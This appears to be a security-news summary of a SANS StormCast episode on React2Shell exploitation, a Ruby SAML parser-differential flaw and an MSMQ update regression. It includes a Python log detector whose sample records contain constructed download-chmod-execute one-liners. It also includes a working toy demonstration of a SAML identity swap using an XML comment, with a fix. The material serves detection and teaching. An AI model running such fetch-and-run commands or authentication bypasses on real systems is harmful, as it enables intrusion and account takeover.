
SANS Internet StormCast
The latest Stormcast episode highlights continued exploitation of React2Shell (CVE-2025-55182). Honeypot logs show a single, widely distributed payload that downloads a file, marks it executable, and then stops short of launching it, which points to a missing component in the attackers' chain rather than to a new technique. Iranian threat actors were observed scanning for vulnerable hosts, a sign that the exploit is now mature and broadly weaponized rather than emerging. For defenders the takeaway is clear: detect the characteristic drop-and-chmod behavior, and make sure endpoint controls block execution from temporary directories. Treat a noexec mount on /tmp as a speed bump rather than a fix, since a dropped script can still be handed to an interpreter (sh /tmp/x) and the download itself is the earlier, more reliable signal.
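As an added illustration of the detection the episode recommends (not code from ISC or the diary), the following Python classifies shell one-liners from a honeypot or command-line log by the download, chmod +x, launch chain, and distinguishes a file that was staged in a temp directory but never run from one that was executed. The record format, the IP addresses (documentation ranges) and the file name /tmp/x are constructed, not taken from the real traffic.

```python
"""Detection for the download -> chmod +x -> (maybe) launch chain described
above. Added example, not ISC's own tooling: the honeypot records below are
constructed, the IP addresses come from documentation ranges, and the file
name /tmp/x is a placeholder, not the real dropper's name."""
import re
import shlex

TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# flags that make each downloader write to a named file
OUTPUT_FLAGS = {"wget": {"-O", "--output-document"}, "curl": {"-o", "--output"}}
# split a one-liner on ; && || and |
SEGMENT_SPLIT = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")
# octal mode with the owner execute bit set (700, 755, 777, 4755, ...)
OCTAL_EXEC = re.compile(r"^[0-7]?[1357][0-7]{2}$")


def _resolve(path, cwd):
    """Make ./x or x absolute against the cwd tracked from earlier 'cd' segments."""
    if path.startswith("/"):
        return path
    rel = path[2:] if path.startswith("./") else path
    return cwd.rstrip("/") + "/" + rel


def analyze_command(cmd):
    """Classify one shell one-liner.

    Returns (verdict, paths): 'none'; 'staged' when a file was downloaded into
    a temp dir and marked executable but never run (the behaviour seen in the
    React2Shell honeypot traffic); 'executed' when it was also launched."""
    cwd = "/"
    downloaded, made_exec, executed = set(), set(), set()
    for seg in SEGMENT_SPLIT.split(cmd):
        try:
            argv = shlex.split(seg)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            argv = seg.split()
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "cd" and len(argv) > 1:
            cwd = _resolve(argv[1], cwd)
            continue
        # 1. file written to disk by a downloader output flag or a shell redirect
        for i, tok in enumerate(argv):
            target = None
            if tok in (">", ">>") or tok in OUTPUT_FLAGS.get(prog, ()):
                if i + 1 < len(argv):
                    target = argv[i + 1]
            elif tok.startswith(">"):
                target = tok.lstrip(">")
            if target:
                downloaded.add(_resolve(target, cwd))
        # 2. chmod adding an execute bit, symbolic (+x, a+x) or octal
        if prog == "chmod":
            operands = [a for a in argv[1:] if not a.startswith("-")]
            if len(operands) > 1 and ("x" in operands[0] or OCTAL_EXEC.match(operands[0])):
                made_exec.update(_resolve(p, cwd) for p in operands[1:])
        # 3. launch: directly by path, or handed to sh/bash
        if prog in ("sh", "bash") and len(argv) > 1 and not argv[1].startswith("-"):
            executed.add(_resolve(argv[1], cwd))
        elif "/" in argv[0]:
            executed.add(_resolve(argv[0], cwd))
    staged = {p for p in downloaded & made_exec if p.startswith(TEMP_DIRS)}
    if not staged:
        return "none", set()
    return ("executed" if staged & executed else "staged"), staged


# Constructed honeypot records: "<timestamp> <source ip> <command line>".
SAMPLE_LOG = [
    # downloaded and armed but never launched, as in the diary's observations
    "2025-12-10T09:14:02Z 203.0.113.5 cd /tmp; wget http://198.51.100.7/x -O /tmp/x; chmod +x /tmp/x",
    # the same chain, this time followed by execution
    "2025-12-10T09:15:40Z 203.0.113.8 cd /tmp && curl -s http://198.51.100.7/x -o ./x && chmod 755 ./x && ./x",
    # benign: a download outside temp directories with no chmod
    "2025-12-10T09:20:11Z 192.0.2.44 wget https://example.com/pkg.tar.gz -O /home/ops/pkg.tar.gz",
]


def scan_log(lines):
    """Run analyze_command over the records and return the suspicious ones."""
    findings = []
    for line in lines:
        ts, src, cmd = line.split(" ", 2)
        verdict, paths = analyze_command(cmd)
        if verdict != "none":
            findings.append({"ts": ts, "src": src, "verdict": verdict, "paths": sorted(paths)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']}: {f['verdict']} {f['paths']}")
```

The segment splitter is deliberately simple. On real EDR telemetry you would key on process-creation events instead (a chmod whose argument lives under a temp directory, followed or not by an exec of that same path), which avoids re-parsing shell syntax and still surfaces the "staged but never launched" case the diary describes.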
The episode also revisits the Ruby SAML vulnerability that resurfaced after an incomplete patch. The root cause is the library's use of two different XML parsers (REXML and Nokogiri, in ruby-saml's case) for signature verification and assertion extraction; the two can interpret the same document differently, so an attacker can craft a document in which the verifier sees one assertion and the application consumes another. A particularly clever twist: the attacker harvests a digitally signed error response from the SAML server (the identity provider) and reuses that signature, produced by the IdP with its own key, as the wrapper for a forged user assertion; the key itself never leaves the IdP. Organizations deploying SAML should upgrade to a fixed ruby-saml release, validate and schema-check responses before handing them to the library, and prefer implementations that parse each document exactly once rather than mixing parsers.
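The parser-differential class behind the Ruby SAML issue, as an added example that is not ruby-saml's or PortSwigger's code: two Python standard-library parsers, ElementTree and minidom, read the same NameID differently when an XML comment sits inside it (the document shape of Duo Labs' 2018 SAML findings). A toy HMAC "signature" and a constructed, namespace-free response stand in for XML-DSig and a real identity provider; the key, the account names and the element layout are assumptions made for the illustration.

```python
"""Parser-differential illustration: verify with one parser, consume with
another. Added example, not ruby-saml's code; HMAC stands in for XML-DSig."""
import hashlib
import hmac
import xml.etree.ElementTree as ET
from xml.dom import minidom

IDP_KEY = b"constructed-idp-key"  # toy shared secret standing in for the IdP's signing key

# Constructed, namespace-free SAML-shaped response. The attacker legitimately
# owns the account "victim@example.com.attacker.test" at the IdP and has put
# an empty XML comment inside the NameID text.
CRAFTED_RESPONSE = b"""<Response>
  <Assertion ID="_a1">
    <Subject><NameID>victim@example.com<!---->.attacker.test</NameID></Subject>
  </Assertion>
</Response>"""

CLEAN_RESPONSE = CRAFTED_RESPONSE.replace(b"<!---->", b"")


def nameid_elementtree(xml_bytes):
    """ElementTree discards comments and joins the text around them."""
    return ET.fromstring(xml_bytes).find(".//NameID").text


def nameid_minidom_firstchild(xml_bytes):
    """A common minidom idiom that reads only the first text node, so it
    stops at the comment."""
    node = minidom.parseString(xml_bytes).getElementsByTagName("NameID")[0]
    return node.firstChild.data


def idp_sign(xml_bytes):
    """The IdP signs the identity as its own parser sees it (comments ignored)."""
    name = nameid_elementtree(xml_bytes)
    return hmac.new(IDP_KEY, name.encode(), hashlib.sha256).hexdigest()


def verify(xml_bytes, sig):
    """Return the NameID the signature vouches for, or None on a bad signature."""
    name = nameid_elementtree(xml_bytes)
    expected = hmac.new(IDP_KEY, name.encode(), hashlib.sha256).hexdigest()
    return name if hmac.compare_digest(expected, sig) else None


def login_vulnerable(xml_bytes, sig):
    """Bug: verifies with ElementTree, then re-extracts the user with minidom.
    The signature checks out for the attacker's account, but the session is
    issued for the victim's."""
    if verify(xml_bytes, sig) is None:
        return None
    return nameid_minidom_firstchild(xml_bytes)


def login_fixed(xml_bytes, sig):
    """Consume exactly the string the verifier checked, and reject any NameID
    that contains comment nodes instead of trying to normalise it."""
    node = minidom.parseString(xml_bytes).getElementsByTagName("NameID")[0]
    if any(c.nodeType == c.COMMENT_NODE for c in node.childNodes):
        return None
    return verify(xml_bytes, sig)


if __name__ == "__main__":
    sig = idp_sign(CRAFTED_RESPONSE)
    print("signed identity :", verify(CRAFTED_RESPONSE, sig))
    print("vulnerable login:", login_vulnerable(CRAFTED_RESPONSE, sig))
    print("fixed login     :", login_fixed(CRAFTED_RESPONSE, sig))
```

The lesson is not the comment trick itself but the structure of the bug: whatever object the signature check validated is the only object the application may act on. A second parse, or a second traversal with different semantics, reopens the gap no matter how strong the signature is.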
Finally, Microsoft's December 2025 cumulative update introduced a regression in Message Queuing (MSMQ). Affected Windows Server 2016 and 2019 hosts and Windows 10 clients start reporting "insufficient memory" or "insufficient disk space" errors despite having plenty of both, and queues stop processing messages. Microsoft has acknowledged the issue (see the release-health link below) but has published no workaround other than uninstalling the update, which also removes that month's security fixes, so enterprises must weigh a broken queuing service against renewed exposure to the patched vulnerabilities. Administrators should monitor MSMQ health (service state, queue depth, and the two error strings in the application logs), isolate services that depend on MSMQ where possible, and rehearse the rollback in a controlled environment as a contingency while waiting for Microsoft's fix.
More React2Shell Exploits CVE-2025-55182
https://isc.sans.edu/diary/More%20React2Shell%20Exploits%20CVE-2025-55182/32572
https://portswigger.net/research/the-fragile-lock
https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-22h2#message-queuing--msmq--might-fail-with-the-december-2025-windows-security-update